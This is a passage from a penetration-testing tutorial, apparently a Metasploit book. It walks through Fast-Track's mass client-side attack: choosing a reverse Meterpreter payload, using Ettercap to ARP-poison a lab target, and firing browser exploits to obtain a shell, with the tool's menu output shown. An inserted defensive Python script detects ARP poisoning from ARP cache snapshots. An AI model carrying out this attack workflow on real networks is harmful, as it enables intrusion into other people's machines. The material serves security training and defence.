Mass Client-Side Attack
The mass client-side attack is similar to the Browser Autopwn function;
however, this attack includes additional exploits and built-in features that
can incorporate ARP cache and DNS poisoning on the target’s machine, and
additional browser exploits not included in Metasploit.
When a user connects to your web server, Fast-Track will fire off every
exploit in its arsenal as well as those in the Metasploit Framework. If the
user’s machine is susceptible to a specific vulnerability within one of these
libraries, the attacker will obtain full access to the target machine.
Enter the number: 4
. . . SNIP . . .
Enter the IP Address you want the web server to listen on: 10.211.55.130
Specify your payload:
1. Windows Meterpreter Reverse Meterpreter
2. Generic Bind Shell
3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
4. Reverse TCP Shell
Enter the number of the payload you want: 1
After selecting option 4, Mass Client-Side Attack, from the main menu,
tell Fast-Track what IP address the web server should listen on, and then
choose a payload.
Next, decide whether to use Ettercap to ARP-poison your target machine.
Ettercap will intercept all requests that the target makes and redirect them to
your malicious server. After confirming that you want to use Ettercap,
enter the IP address of the target you want to poison. Fast-Track will then
go ahead and set up Ettercap for you.
Would you like to use Ettercap to ARP poison a host yes or no: yes
. . . SNIP . . .
What IP Address do you want to poison: 10.211.55.128
Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...
. . . SNIP . . .
Filter compiled...Running Ettercap and poisoning target...
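Seen from the defender's side, the ARP poisoning that Ettercap performs here leaves a trace in the poisoned host's ARP cache. The following is an added example, not code from the book or from Fast-Track: it compares two Windows-format `arp -a` snapshots; the gateway address 10.211.55.1, all MAC addresses and the function names are constructed assumptions.

```python
import re
from collections import defaultdict

# One row of Windows `arp -a` output: IP, MAC (dash- or colon-separated), entry type.
ROW = re.compile(r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
                 r"([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+(\w+)")

def parse_arp(text):
    """Return {ip: mac} for dynamic entries only; static rows (broadcast,
    multicast) legitimately share MACs and would cause false positives."""
    table = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m and m.group(3).lower() == "dynamic":
            table[m.group(1)] = m.group(2).lower().replace("-", ":")
    return table

def find_poisoning(baseline, current):
    """Compare a trusted snapshot with a later one; return sorted findings."""
    findings = []
    # Signal 1: a known IP now maps to a different MAC than in the baseline.
    for ip, mac in current.items():
        old = baseline.get(ip)
        if old and old != mac:
            findings.append(("mac_changed", ip, f"{old} -> {mac}"))
    # Signal 2: one MAC answers for several IPs (the poisoning host's own
    # address plus every address it is impersonating).
    by_mac = defaultdict(list)
    for ip, mac in current.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.extend(("shared_mac", ip, mac) for ip in ips)
    return sorted(findings)

# Constructed snapshots as seen from 10.211.55.128 (MACs and gateway are made up).
BASELINE = """Interface: 10.211.55.128 --- 0xb
  Internet Address      Physical Address      Type
  10.211.55.1           00-1c-42-00-00-18     dynamic
  10.211.55.130         00-1c-42-aa-bb-cc     dynamic
  10.211.55.255         ff-ff-ff-ff-ff-ff     static
  255.255.255.255       ff-ff-ff-ff-ff-ff     static
"""
POISONED = BASELINE.replace("00-1c-42-00-00-18", "00-1c-42-aa-bb-cc")

if __name__ == "__main__":
    for kind, ip, detail in find_poisoning(parse_arp(BASELINE), parse_arp(POISONED)):
        print(f"[ALERT] {kind:<12} {ip:<15} {detail}")
```

Either signal alone can be noisy (a replaced network card, a router with several addresses), so the two together on the gateway entry are the stronger indicator.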
Once a client connects to your malicious server, Metasploit fires exploits
at the target. In the following listing, you can see that the Adobe exploit is
successful, and a Meterpreter shell is waiting.